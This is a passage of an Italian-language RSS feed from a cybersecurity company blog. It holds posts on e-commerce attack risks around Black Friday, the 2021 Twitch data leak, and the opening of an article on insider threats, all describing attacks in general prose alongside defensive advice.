         <guid>https://blog.cybergon.com/posts/black-friday-e-cyber-monday-i-rischi-informatici-dell-e-commerce/</guid>
         <description>

&lt;p&gt;Un attacco durato 5 giorni, quello di un gruppo di &lt;strong&gt;cyber attaccanti che hanno rubato tutti i dati sensibili&lt;/strong&gt; dei clienti che hanno acquistato sull’e-commerce di &lt;strong&gt;Tupperware&lt;/strong&gt;. Un danno che è costato parecchio all’azienda statutinense, nota per i suoi contenitori di plastica per alimenti, sia in termini monetari, ma, soprattutto, in termini di reputazione e di customer care. L’attacco ha permesso di raccogliere e &lt;strong&gt;rivendere preziose informazioni personali dei singoli clienti&lt;/strong&gt;, tra cui anagrafiche complete e metodi di pagamento validi.&lt;/p&gt;

&lt;p&gt;I cyber criminali, attraverso un codice malevolo, creavano un &lt;em&gt;iframe&lt;/em&gt; sulla pagina ufficiale dell’ecommerce dell’azienda per clonare il modulo originale di pagamento di VISA CyberSource e carpire da lì i dati sensibili.&lt;/p&gt;

&lt;h2 id=&#34;il-paradigma-dell-e-commerce&#34;&gt;Il paradigma dell’e-commerce&lt;/h2&gt;

&lt;p&gt;Questo è solo uno dei tanti esempi che riguardano il mondo dell’ecommerce, un canale che ha profondamente modificato le nostre abitudini di acquisto di prodotti e servizi, ma che può essere vettore di &lt;strong&gt;attacchi informatici pervasivi e impattanti per il business.&lt;/strong&gt;
Ad oggi i siti e-commerce, nuovo canale imprescindibile soprattutto a seguito della globalizzazione, rappresentano non solo un alter ego digitale dei negozi fisici, ma anche un importante strumento di fiducia e fidelizzazione.&lt;/p&gt;

&lt;p&gt;Secondo il &lt;strong&gt;Salesforce Shopping Index&lt;/strong&gt;, nel Q1 del 2021 l’e-commerce in Italia ha beneficiato di &lt;strong&gt;una crescita del 78%&lt;/strong&gt;, posizionandosi al quarto posto al mondo dopo Canada, Olanda e Regno Unito.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/e-commerce/Grafico_crescita_e-commerce.jpg&#34; alt=&#34;Grafico_crescita_e-commerce&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Seguendo il principio del &lt;strong&gt;“follow the money”&lt;/strong&gt;, le organizzazioni criminali hanno trovato in questo aumento vertiginoso di vendite online un’occasione ghiotta di profitto, orchestrando attacchi informatici sofisticati e costruendo meccanismi di frode sempre più avanzati.&lt;/p&gt;

&lt;p&gt;Secondo l’&lt;strong&gt;Imperva’s Cyber Threat Index (CTI)&lt;/strong&gt;, che fornisce un punteggio di facile comprensione per il monitoraggio degli attacchi informatici a livello planetario, sono stati registrati &lt;strong&gt;nel 2020 oltre 30 miliardi di attacchi&lt;/strong&gt; contro le web application del retail online.&lt;/p&gt;

&lt;p&gt;Due sono le variabili che rendono l’e-commerce un target così appetibile: la prima è sicuramente la quantità di denaro che circola ogni giorno online – il &lt;strong&gt;Report CA E-commerce&lt;/strong&gt; in Italia afferma che nel 2020 la spesa media per e-shopper è pari a 674 euro. La seconda è, invece, la quantità di dati sensibili che ogni giorno vengono inseriti dagli utenti, ad esempio le credenziali di accesso agli account e i riferimenti delle carte di credito.&lt;/p&gt;

&lt;p&gt;Considerando l’afflusso generato solamente dal &lt;strong&gt;Black Friday e dal Cyber Monday&lt;/strong&gt;, dai quali secondo Statista derivano &lt;strong&gt;20 miliardi di dollari di fatturato&lt;/strong&gt; in due sole giornate, è facile intuire l’interesse dei criminali a registrare anche più di &lt;strong&gt;1000 domini somiglianti ai domini originali delle aziende&lt;/strong&gt;, in modo da impersonificare i marketplace più famosi come Amazon e E-bay e rubare dati sensibili alle vittime.&lt;/p&gt;

&lt;p&gt;Nel grafico sottostante, si può notare il picco di attività criminale che contraddistingue il periodo tra fine novembre-inizio dicembre e che coincide con l’inizio di Black Friday e Cyber Monday.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/e-commerce/Black_friday_Cyber_Monday.JPG&#34; alt=&#34;Picco_di_attacchi&#34; /&gt;&lt;/p&gt;

&lt;h1 id=&#34;metodologie-di-cyber-attacco&#34;&gt;Metodologie di cyber-attacco&lt;/h1&gt;

&lt;p&gt;Le tipologie di attacchi informatici all’e-commerce sono molteplici e si differenziano rispetto al target colpito, ovvero l’azienda o il cliente, e all’obiettivo del criminale.&lt;/p&gt;

&lt;h2 id=&#34;lato-aziendale&#34;&gt;Lato aziendale&lt;/h2&gt;

&lt;p&gt;Il criminale che prepara un attacco mirato ad un e-commerce avrà come obiettivo quello di colpire l’infrastruttura IT della vittima, come il sito internet o i server che lo ospitano.&lt;/p&gt;

&lt;p&gt;1. &lt;strong&gt;Il defacing del sito&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Il defacing, dall’inglese “sfigurare”, è la deturpazione di un sito web che viene modificato tramite un accesso non-autorizzato. La rivendicazione dell’atto avviene in modo immediato tramite firme digitali come &lt;em&gt;“you got hacked”&lt;/em&gt; o &lt;em&gt;“pwnd”&lt;/em&gt; con il nome dell’attaccante e le immagini.&lt;/p&gt;

&lt;p&gt;Questa tipologia di attacco è una tra le più impattanti per l’immagine di un brand, poiché causa ripercussioni dirette sulla fiducia dei consumatori.
A giugno 2021, una vulnerabilità della &lt;strong&gt;versione 4.7.1 di WordPress (CVE-2017-5487)&lt;/strong&gt; ha coinvolto il 28,4% di tutti siti mondali. Nell’immagine possiamo vedere una classifica dei primi 25 indirizzi IP che hanno sfruttato a proprio vantaggio la vulnerabilità.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/e-commerce/Defacing_siti_e-commerce.jpg&#34; alt=&#34;Defacing_siti_hackerati&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Un recente caso di defacement recente è avvenuto durante l’attacco alla piattaforma di &lt;a href=&#34;https://cybergon.com/blog/posts/lattacco-informatico-alla-piattaforma-streaming-pi%C3%B9-grande-al-mondo-il-caso-twitch/&#34;&gt;streaming Twitch&lt;/a&gt; e ha riguardato l’introduzione di una fotografia di Jeff Bezos come sfondo al canale multiplayer Dota2.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/e-commerce/dota_2_defacement_twitch.jpg&#34; alt=&#34;Dota_2_defacement_twitch&#34; /&gt;&lt;/p&gt;

&lt;p&gt;2. &lt;strong&gt;Attacchi DDOS&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Essere operativi &lt;sup&gt;24&lt;/sup&gt;&amp;frasl;&lt;sub&gt;7&lt;/sub&gt; è diventata una prerogativa dell’e-commerce: le conseguenze di un fermo sistemistico possono causare, oltre al danno per il mancato incasso durante il tempo in cui l’e-commerce è rimasto irraggiungibile, l’abbandono della piattaforma da parte degli utenti e uno spiacevole senso di sfiducia.&lt;/p&gt;

&lt;p&gt;Il &lt;em&gt;Distributed Denial of Service&lt;/em&gt; è un attacco efficace utilizzato dai criminali per saturare di richieste un sito e renderlo così non-operativo.
Per indirizzare attacchi DDos alle applicazioni web dell’e-commerce vengono utilizzate delle botnet, cioè una serie di reti di server o dispostivi infetti controllati dai criminali per eseguire script automatizzati e causare l’interruzione del servizio.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Nel 2020 Amazon Web Services&lt;/strong&gt; ha dovuto affrontare per tre giorni una delle offensive più grandi nella storia, con circa 2,3 Terabit per secondo, che risultò essere il 44% più grande rispetto a qualsiasi attacco informatico mai registrato della stessa tipologia.&lt;/p&gt;

&lt;p&gt;3. &lt;strong&gt;Cross-site scripting&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Un altro attacco informatico molto utilizzato è il &lt;em&gt;cross-site scripting (XSS)&lt;/em&gt;, ovvero un’iniezione di codice malevolo per sfrutta le vulnerabilità di siti web dinamici. In questo caso, gli attaccanti neutralizzano in modo errato l&amp;rsquo;input dei form esposti online tramite alcune applicazioni che successivamente permettono l’esecuzione di script malevoli, per esempio, in Javascript.&lt;/p&gt;

&lt;p&gt;Esistono due tipi principali di XSS:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;XSS non-persistente o riflesso&lt;/strong&gt;
Gli attacchi riflessi sono quelli in cui lo script iniettato viene riflesso dal server, ad esempio in un messaggio di errore, nel risultato di una ricerca o in qualsiasi altra risposta che includa l&amp;rsquo;input inviato al server come un login. Quando &lt;strong&gt;un utente clicca su un collegamento malevolo&lt;/strong&gt;, ad esempio all’interno di una mail di phishing, il codice iniettato viaggia verso il sito web vulnerabile che riflette l&amp;rsquo;attacco al browser dell&amp;rsquo;utente. Il browser in questo caso esegue il codice perché proviene da un server &amp;ldquo;attendibile&amp;rdquo;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;XSS persistente o archiviato&lt;/strong&gt;
In questo caso l&amp;rsquo;applicazione web archivia il codice malevolo del criminale in un database o in un registro. In un secondo momento, lo &lt;em&gt;script&lt;/em&gt; viene riletto ed eseguito dall&amp;rsquo;applicazione includendolo nel contenuto dinamico.
I criminali ricercano un luogo ottimale per iniettare lo script dannoso. Alcuni esempi possono riguardare un’area visualizzata da un numero elevato di utenti, come un login, o applicazioni dove &lt;strong&gt;vengono inseriti dati sensibili da trafugare&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;lato-cliente&#34;&gt;Lato cliente&lt;/h2&gt;

&lt;p&gt;Sempre più attacchi coinvolgono direttamente l’utente che acquista online sui siti di e-commerce e, nonostante questi non riguardino direttamente l’infrastruttura IT dell’azienda, possono avere ripercussioni importanti sul business.
Tra le minacce più diffuse, le frodi basate sul phishing e credential stuffing hanno raggiunto una dimensione sempre più preoccupante, tanto che le aziende di e-commerce si sono viste obbligate a rimborsare le vittime.&lt;/p&gt;

&lt;p&gt;1. &lt;strong&gt;Phishing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Si tratta di e-mail che impersonificano un brand e convincono l’utente a cui sono indirizzate a fornire le credenziali di accesso ad un servizio. Imitando nell’aspetto e nella terminologia l’azienda, il criminale informatico ottiene preziose informazioni per poter accedere in modo indisturbato agli account e acquistare a nome della vittima.&lt;/p&gt;

&lt;p&gt;2. &lt;strong&gt;Credential stuffing&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Secondo Akamai, leader di servizi CDN, nel periodo dal 1° luglio 2018 al 30 giugno 2020, oltre &lt;strong&gt;il 90% dei 64 miliardi di tentativi di credential stuffing&lt;/strong&gt; registrati ha colpito il settore del retail online. North Face, il gigante dell&amp;rsquo;abbigliamento outdoor, il 13 novembre 2020 ha notificato ai clienti di essere stato colpito da un attacco di credential stuffing e che diversi criminali potrebbero aver ottenuto l’accesso alle loro informazioni personali.&lt;/p&gt;

&lt;p&gt;Un attacco di credential stuffing si verifica quando i criminali informatici utilizzano software automatizzati per fare tentativi di accesso con dati precedentemente acquisiti da un altro set di dati trafugati. Se l’utente abitualmente ricicla sempre la medesima password, corre il rischio di avere il proprio account compromesso.&lt;/p&gt;

&lt;p&gt;Fortunatamente, &lt;strong&gt;North Face&lt;/strong&gt; utilizza la &lt;em&gt;tokenizzazione&lt;/em&gt; per offuscare i dettagli della carta del cliente, ma altre tipologie di informazioni personali sono state accessibili a terzi. Tra queste, si elencano nome, cognome, prodotti acquistati, data di nascita, numero di telefono, indirizzo di fatturazione, indirizzo di spedizione e saldo dei punti fedeltà. A seguito dell’attacco, l&amp;rsquo;azienda ha eliminato tutti i token delle carte di pagamento sul sito, ha limitato gli accessi dalle fonti sospette e &lt;strong&gt;ha disabilitato tutte le password degli account compromessi.&lt;/strong&gt;&lt;/p&gt;

&lt;h2 id=&#34;remediation&#34;&gt;Remediation&lt;/h2&gt;

&lt;p&gt;Nonostante i cyber attacchi alle piattaforme di e-commerce siano sempre più frequenti e impattanti, la predisposizione ad investire in un’efficace strategia di security rimane ancora molto bassa.&lt;/p&gt;

&lt;p&gt;Secondo &lt;strong&gt;un’indagine del 2019 dell’Osservatorio di Digital Innovation&lt;/strong&gt;, il settore e-commerce in Italia è uno tra i meno propensi a investimenti mirati in sicurezza informatica e data protection, con ben &lt;strong&gt;il 38% dei referenti IT intervistati&lt;/strong&gt; che considerano &lt;em&gt;“non molto importante”&lt;/em&gt; proteggere il proprio business online.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/e-commerce/Grafico_investimenti_e-commerce.jpg&#34; alt=&#34;Defacing_siti_hackerati&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Tuttavia, considerata l’evoluzione degli eventi nell’ambito della sicurezza digitale, nasce la necessità sempre più stringente di sviluppare una strategia per la difesa del proprio e-commerce a più livelli.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;La protezione dell’e-commerce&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;a.  Il Backup&lt;/p&gt;

&lt;p&gt;In caso di attacco informatico, il backup diventa l’unica procedura tecnologica che permette di ripartire in sicurezza e in tempi rapidi. Affiancato da un piano di disaster recovery, il backup deve essere utilizzato non solo per conservare tutti i dati del business, ma anche per creare un e vero proprio duplicato del sito e-commerce.&lt;/p&gt;

&lt;p&gt;b.  Protezione Anti-ransomware&lt;/p&gt;

&lt;p&gt;Quest’anno il ransomware &lt;em&gt;LokiBot 2.0&lt;/em&gt; è riuscito a mettere offline il sistema di prenotazioni regionale della Regione Lazio causando ritardi e rallentamenti nelle vaccinazioni. Essere pronti a fronteggiare un attacco ransomware permette di mantenere l’operatività dei server e il back-end utilizzati dal sito.&lt;/p&gt;

&lt;p&gt;Implementare una soluzione XDR, acronimo di &lt;em&gt;Extended Detection e Response&lt;/em&gt;, permette di rilevare in modo più rapido le minacce e di migliorare i tempi di risposta attraverso l&amp;rsquo;analisi degli eventi nel perimetro.&lt;/p&gt;

&lt;p&gt;c.  La gestione degli aggiornamenti&lt;/p&gt;

&lt;p&gt;La gestione delle patch e degli aggiornamenti di sistema giocano un ruolo fondamentale per la &lt;strong&gt;risoluzione tempestiva delle vulnerabilità&lt;/strong&gt; dei software e della piattaforma dove risiede il sito e-commerce.&lt;/p&gt;

&lt;p&gt;d.  Cifratura&lt;/p&gt;

&lt;p&gt;La cifratura del database del sito è necessaria per scongiurare altre tipologie di &lt;em&gt;Injection&lt;/em&gt; di codice malevolo e andrebbe accompagnata dall’attivazione di un certificato SSL/TL. Tali protocolli crittografici proteggono i dati che transitano tra il sito e l’utente ed &lt;strong&gt;evitano gli attacchi di intercettazione&lt;/strong&gt; detti &lt;em&gt;“man in the middle”&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;e.  Password&lt;/p&gt;

&lt;p&gt;Attivare l’&lt;em&gt;MFA&lt;/em&gt; per accedere agli account e scegliere una password efficace con almeno 12 caratteri, numeri e simboli speciali sono piccoli passi per una protezione più efficace.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;La scelta della piattaforma&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Scegliere la piattaforma corretta per ospitare il sito e-commerce è la base per mantenere un alto livello di affidabilità che assicuri la continuità di business. Come è stato per &lt;a href=&#34;https://cybergon.com/blog/posts/attacchi-alla-supply-chain-il-caso-kaseya/&#34;&gt;Kaseya&lt;/a&gt;, gli attacchi ai fornitori di servizi di hosting dei sistemi sono sempre più comuni e coinvolgono specialmente i fornitori di piattaforme in modalità SaaS. Questo accade perché i &lt;strong&gt;Cyber criminali preferiscono sfruttare l’economia di scala&lt;/strong&gt; ed attaccare il fornitore che effettua l’hosting piuttosto che il singolo dominio di un e-commerce.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Effettuare PT e VA&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;I penetration test e i vulnerability assessment sono stress test importanti per le infrastrutture IT che devono essere effettuati da esperti in cyber security in modo ricorrente. Queste attività permettono di prendere coscienza dei punti deboli dell’infrastruttura IT di un’azienda, compreso il sito e-commerce, e provvedere con delle azioni di remediation.&lt;/p&gt;

&lt;h2 id=&#34;conclusione&#34;&gt;Conclusione&lt;/h2&gt;

&lt;p&gt;Queste misure sono solo il primo passo &lt;strong&gt;per una corretta strategia di protezione dei siti e-commerce&lt;/strong&gt;, ma rappresentano una variabile di differenziazione per qualità del servizio e di attenzione verso il cliente che possono fare la differenza, specialmente se il sito internet rappresenta la principale fonte di guadagno di un brand.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>L&#39;attacco informatico alla piattaforma streaming più grande al mondo: il caso Twitch</title>
         <link>https://blog.cybergon.com/posts/lattacco-informatico-alla-piattaforma-streaming-pi%C3%B9-grande-al-mondo-il-caso-twitch/</link>
         <pubDate>Thu, 28 Oct 2021 12:20:01 +0000</pubDate>
         <authors>
         
              
             <author>Elisa Ballerio</author>
         
               
             <author>Francesco Sirio Monti</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/lattacco-informatico-alla-piattaforma-streaming-pi%C3%B9-grande-al-mondo-il-caso-twitch/</guid>
         <description>

&lt;p&gt;Con oltre 30 milioni di utenti attivi al giorno, di cui &lt;strong&gt;4 milioni solo in Italia&lt;/strong&gt;, Twitch è una delle piattaforme di streaming più popolari al mondo, caratterizzata da dirette live di gaming trasmesse da una community di 2,5 milioni di Content Creator. Fortnite, League of Legends, Minecraft e Counter-Strike sono solo alcuni dei molti videogiochi che riuniscono sulla piattaforma appassionati e curiosi.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/twitch/twitch-attacco.png&#34; alt=&#34;twitch-attacco&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Twitch è stato acquisito da Amazon nel 2014 per 970 milioni di dollari ed è diventato la &lt;strong&gt;quarta fonte di traffico internet negli USA&lt;/strong&gt; dopo Netflix, Google e Apple. La sua popolarità sempre crescente ha perfino spinto diversi esponenti della politica americana, come il Senatore Bernie Sanders e l’ex Presidente Donald Trump, ad aprire un canale personale, ovviamente con fini differenti rispetto alle live-stream.&lt;/p&gt;

&lt;h2 id=&#34;il-violento-attacco-informatico&#34;&gt;Il violento attacco informatico&lt;/h2&gt;

&lt;p&gt;Il 6 ottobre 2021 su 4chan, sito web utilizzato in passato da Anonymous per la pubblicazione di materiale riservato, un utente anonimo &lt;strong&gt;ha pubblicato un link di Torrent per il download di 125 GB di dati&lt;/strong&gt; derivati da una presunta violazione di Twitch. La piattaforma stessa &lt;strong&gt;ha successivamente confermato la perdita dei dati&lt;/strong&gt; con un comunicato ufficiale.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/twitch/twitch-conferma.JPG&#34; alt=&#34;twitch-conferma&#34; /&gt;&lt;/p&gt;

&lt;p&gt;L’utente anonimo ha dichiarato di aver condiviso le informazioni esfiltrate &lt;strong&gt;per favorire la concorrenza tra piattaforme di live streaming&lt;/strong&gt; online e per danneggiare la “Community tossica” di Twitch, che negli scorsi mesi si è visto costretto ad implementare urgentemente alcune procedure di controllo e di verifica delle identità per fermare le innumerevoli manifestazioni di odio e violenza verbale che stavano colpendo molti utenti e creatori di contenuti.&lt;/p&gt;

&lt;h2 id=&#34;analisi-del-contenuto-del-leak&#34;&gt;Analisi del contenuto del leak&lt;/h2&gt;

&lt;p&gt;Secondo quanto riferito dal blogger &lt;a href=&#34;https://sizeof.cat/post/twitch-leaks/&#34;&gt;Sizeofcat&lt;/a&gt;, i dati di Twitch trapelati includono lo &lt;strong&gt;storico del codice sorgente di Twitch&lt;/strong&gt; dagli esordi della piattaforma ad oggi, con quasi 6.000 repository di Git. Grazie al leak si può avere accesso ad ogni commit dei fix temporanei o degli sviluppi eseguiti da parte dei programmatori nel tempo, con tanto di titolo e descrizione.&lt;/p&gt;

&lt;p&gt;Il criminale che entra in possesso del codice ha dunque una visione completa di tutta &lt;strong&gt;l’infrastruttura di Twitch&lt;/strong&gt;, dalla gestione della piattaforma, ai messaggi, fino ai database utilizzati per il back-end.&lt;/p&gt;

&lt;p&gt;Il pericolo principale, però, risiede nella &lt;strong&gt;consultazione del codice esposto per la ricerca di vulnerabilità&lt;/strong&gt; da parte dei criminali informatici: chi possiede la capacità di analisi tecnica e gli strumenti adeguati può trovare e sfruttare le &lt;em&gt;vulnerabilità zero-day&lt;/em&gt; contenute del codice e ancora sconosciute agli sviluppatori di Twitch.&lt;/p&gt;

&lt;p&gt;Inoltre, nel repository di Git sono anche salvate funzionalità o porzioni di codice in fase di testing o non ancora rilasciate, e si possono perfino &lt;strong&gt;recuperare credenziali&lt;/strong&gt; rimaste nel codice durante le release.
Oltre al codice sorgente sono state esfiltrate informazioni su:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;I client Twitch per dispositivi mobili, desktop e console;&lt;/li&gt;
&lt;li&gt;I servizi AWS interni utilizzati dalla piattaforma di stream es. database, VM;&lt;/li&gt;
&lt;li&gt;L’SDK, ovvero il software development kit, l’ambiente di sviluppo utilizzato internamente per creare codice e programmi proprietari;&lt;/li&gt;
&lt;li&gt;L’IGDB ovvero video game database e CurseForge, la più grande repository per videogiochi per scaricare le diverse funzionalità aggiuntive chiamate mods.&lt;/li&gt;
&lt;li&gt;Strumenti interni di &amp;ldquo;red teaming” utilizzati per difendere la piattaforma da attacchi informatici. A tal proposito, due ex ingegneri informatici di Twitch sono stati intervistati dalla rivista Platformer che si occupa di “big tech e democrazia” e hanno espresso in modo anonimo la loro preoccupazione per la scarsa attenzione alla sicurezza interna dell’azienda americana.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Dalle informazioni trafugate, sembrerebbe che Amazon Game Studios stia lavorando a Vapor e a Vapeworld, rispettivamente un nuovo prototipo di game store e un nuovo gioco scritto in codice Unity. Dal punto di vista commerciale, il leak potrebbe quindi avere un impatto ancora maggiore, poiché avvantaggerebbe uno dei &lt;strong&gt;maggiori concorrenti di Amazon&lt;/strong&gt;, cioè la Valve Corporation di Steam.
Una fonte anonima afferma in un post su Twitter che il data set include &lt;strong&gt;gli indirizzi e-mail di dominio justin.tv&lt;/strong&gt; utilizzate dagli sviluppatori della piattaforma in “memoria” dell’azienda dalla quale è nato Twitch. Si tratta di un’altra informazione sensibile che potrebbe essere sfruttata per future campagne di phishing da parte dei criminali.&lt;/p&gt;

&lt;p&gt;Per concludere, dai documenti esfiltrati &lt;strong&gt;trapelano gli stipendi&lt;/strong&gt; da agosto 2019 a ottobre 2021 dei 100 streamer più pagati, tra cui CriticalRole, xQcOW e summit1g, che hanno guadagnato più di 20 milioni di dollari lavorando con la popolare piattaforma di streaming. Sono elencati anche i primi 80 streamer, con una media di guadagno di un milione di euro. Ciò che non include il leak è il denaro che gli streamer hanno guadagnato al di fuori di Twitch, inclusi merchandising, entrate di YouTube, sponsorizzazioni e donazioni esterne.&lt;/p&gt;

&lt;p&gt;Il file è basato sul codice di twitchearnings.com ed è stato poi riportato in un CSV, che si presenta in questo formato:&lt;/p&gt;

&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Position&lt;/th&gt;
&lt;th&gt;Username&lt;/th&gt;
&lt;th&gt;User ID&lt;/th&gt;
&lt;th&gt;GrossEarning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;

&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;xxxx&lt;/td&gt;
&lt;td&gt;234234&lt;/td&gt;
&lt;td&gt;56789&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;La &lt;strong&gt;disponibilità gratuita del leak&lt;/strong&gt;, riportata anche dal sito Video Games Chronicle, ha comportato l’accorrere di migliaia di gamers curiosi che hanno scaricato i dati sensibili. Il file di 125 GB è stato attualmente chiamato “Parte 1”, lasciando intendere che, in realtà, &lt;strong&gt;il breach è ancora più esteso&lt;/strong&gt; di quello pubblicato. Non è stato ancora specificato cos’altro verrà rilasciato.&lt;/p&gt;

&lt;p&gt;Secondo un’altra fonte, oltre al leak del codice sorgente, sarebbe avvenuto anche &lt;strong&gt;il furto di password crittografate&lt;/strong&gt;. L’uguaglianza data breach = password non è sempre veritiera e, in questo caso non ancora verificata, il che, potrebbe portare i criminali a &lt;em&gt;hoaxes&lt;/em&gt; di rivendita di credenziali nel &lt;em&gt;dark web&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;In ogni caso, si raccomanda a tutti gli utenti di &lt;strong&gt;cambiare le credenziali e di abilitare l&amp;rsquo;autenticazione a due fattori&lt;/strong&gt; per proteggere la propria identità digitale, collegando un numero di telefono all’account.
Concludiamo con una nota &lt;em&gt;nerd&lt;/em&gt;: il golden K. Per chi non fosse avvezzo a Twitch, si tratta di una &lt;strong&gt;emoticon leggendaria dorata disponibile per un solo giorno&lt;/strong&gt; che si pensava venisse assegnata causalmente dalla piattaforma. Grazie al leak e alla lettura del codice sorgente, diversi analisti hanno scoperto che l’emoticon poteva essere in realtà assegnata da alcuni utenti in modo deterministico, creando un certo fermento nelle chat live dei creators.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/twitch/golden-k.png&#34; alt=&#34;golden-k&#34; /&gt;&lt;/p&gt;

&lt;h2 id=&#34;conclusione&#34;&gt;Conclusione&lt;/h2&gt;

&lt;p&gt;Il leak di Twitch rimarrà uno dei data breach più impattanti nella storia della sicurezza informatica, sia per la qualità del contenuto esfiltrato, sia come emblema di attacco ad una community specifica, quella dello streaming online. Un attacco differente per certi termini, che non punta al solo guadagno finanziario, ma è &lt;strong&gt;motivato dal perpetrarsi dei raid di odio nella piattaforma&lt;/strong&gt;. Ripercussioni più serie sull’azienda americana saranno visibili molto probabilmente nel medio-lungo termine, quando i criminali informatici &lt;strong&gt;sfrutteranno le informazioni del leak&lt;/strong&gt; per raccogliere moneta virtuale e alimentare il proprio &lt;a href=&#34;https://cybergon.com/blog/posts/businessmodelcanvas/&#34;&gt;dark business model canvas&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Rimane tutt’ora l’incognita della &lt;strong&gt;futura pubblicazione della “Part 2”&lt;/strong&gt; da parte dell’utente anonimo di 4chan dal quale tutto è cominciato, che potrebbe sconvolgere nuovamente le carte in tavola e aggiungere elementi alla già complessa compromissione.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Insider Threats: quando l&#39;attacco informatico proviene dall&#39;interno</title>
         <link>https://blog.cybergon.com/posts/insider-threats-quando-attacco-informatico-proviene-dall-interno/</link>
         <pubDate>Fri, 15 Oct 2021 10:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Elisa Ballerio</author>
         
               
             <author>Jeremy Moeys</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/insider-threats-quando-attacco-informatico-proviene-dall-interno/</guid>
         <description>

&lt;p&gt;Secondo il report &lt;strong&gt;Threat Landscape 2021&lt;/strong&gt; di Enisa, il dipendente aziendale sarebbe responsabile dell’&lt;strong&gt;84% delle compromissioni del perimetro informatico&lt;/strong&gt;. Il dato dimostra chiaramente come ancora oggi l’essere umano sia l’anello debole della catena della cyber security.&lt;/p&gt;

&lt;p&gt;Il National Institute of Standards and Technologies classifica le minacce informatiche che provengono dal personale interno all’azienda come &lt;strong&gt;Insider Threats&lt;/strong&gt; e sottolinea l’importanza della presa di coscienza della minaccia come primo passo necessario per la mitigazione del rischio informatico.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/insider-threat/insider.jpg&#34; alt=&#34;insider&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Un &lt;strong&gt;cyber insider è chiunque dispone o ha avuto accesso in passato a dati&lt;/strong&gt;, informazioni privilegiate relative alle pratiche di sicurezza e sistemi informatici di un&amp;rsquo;organizzazione, come dipendenti, fornitori, ex collaboratori oppure consulenti. La minaccia di cui è portatore un cyber insider può concretizzarsi in frodi, furto di informazioni riservate di valore commerciale e non, appropriazione illecita di proprietà intellettuale o sabotaggio di sistemi informatici. È bene sottolineare, però, che il dipendente &lt;strong&gt;può essere cosciente o inconsapevole&lt;/strong&gt; di star recando danno alla propria azienda.
Ecco alcuni esempi:&lt;/p&gt;

&lt;h3 id=&#34;l-insider-malintenzionato&#34;&gt;L&amp;rsquo;insider malintenzionato&lt;/h3&gt;

&lt;p&gt;Viene definito come un individuo che &lt;strong&gt;consapevolmente approfitta dell’accesso ai sistemi informatici&lt;/strong&gt; per infliggere danni a un&amp;rsquo;organizzazione o a un’azienda. Le motivazioni che lo spingono possono essere ricondotte al desiderio di guadagno o all’espressione di forte malcontento nell’ambito lavorativo.
Negli anni sono stati registrati diversi casi di pressioni esterne da parte di criminali informatici che, sfruttando ingenti somme di denaro, provano a &lt;strong&gt;corrompere i dipendenti&lt;/strong&gt; che hanno più facilmente accesso ai dati e che sono inclini a cederli.&lt;/p&gt;

&lt;p&gt;Secondo un report del Software Engineering Institute in collaborazione col &lt;em&gt;US CERT Team&lt;/em&gt;, l’&lt;strong&gt;80% degli attacchi interni nelle aziende è avvenuto in sede e durante l’orario di lavoro&lt;/strong&gt; e l’insider è stato identificato nel 74% dei casi dopo indagini cyber-forensi. Riguardo alle motivazioni, l’81% menziona il guadagno finanziario, mentre solo il 23% la vendetta personale.&lt;/p&gt;

&lt;p&gt;Un caso che ha attirato l’opinione della community di cyber security è Tesla, che ha registrato un tentativo di corruzione di un suo dipendente da parte di un criminale informatico russo nell’agosto 2020. L’FBI ha arrestato il ventisettenne di nome &lt;em&gt;Egor Igorevich Kriuchkov&lt;/em&gt; per aver offerto un milione di dollari in bitcoin ad un impiegato della Gigafactory in Nevada per installare un malware sulla rete utilizzando una chiavetta USB.&lt;/p&gt;

&lt;p&gt;L’obiettivo? Chiedere un &lt;strong&gt;riscatto di milioni di dollari&lt;/strong&gt; per i dati esfiltrati e minacciare Elon Musk di pubblicare le informazioni online in caso di resistenza.
